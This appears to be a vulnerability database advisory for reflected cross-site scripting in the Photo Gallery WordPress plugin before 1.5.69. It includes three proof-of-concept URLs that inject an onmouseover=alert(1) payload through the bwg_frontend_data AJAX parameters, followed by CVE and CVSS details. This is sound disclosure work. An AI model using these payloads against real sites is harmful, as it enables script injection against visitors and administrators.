WordPress Plugin Vulnerabilities

Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS)

Description

The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&tag=%22%20onmouseover=alert(1)%3E

https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&theme_id=%22%20onmouseover=alert(1)%3E

https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery_id=1%22%20onmouseover=alert(1)%3E

Affects Plugins

Plugin icon
photo-gallery
Fixed in 1.5.69

References

CVE
CVE-2021-24291
URL
https://packetstormsecurity.com/files/#162227/

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
ThuraMoeMyint
Verified
Yes
WPVDB ID
cfb982b2-8b6d-4345-b3ab-3d2b130b873a

Timeline

Publicly Published
2021-04-19 (about 3 years ago)
Added
2021-04-20 (about 3 years ago)
Last Updated
2021-04-27 (about 3 years ago)

Other

Published
Title
Published
2017-03-01
Title
Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
Published
2022-10-29
Title
Glossary <= 3.1.2 - Contributor+ Stored XSS
Published
2023-07-24
Title
CodeBard's Patron Button and Widgets for Patreon < 2.1.9 - Reflected XSS
Published
2018-07-28
Title
Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS)
Published
2022-06-14
Title
Gravity PDF < 6.3.1 - Reflected Cross-Site Scripting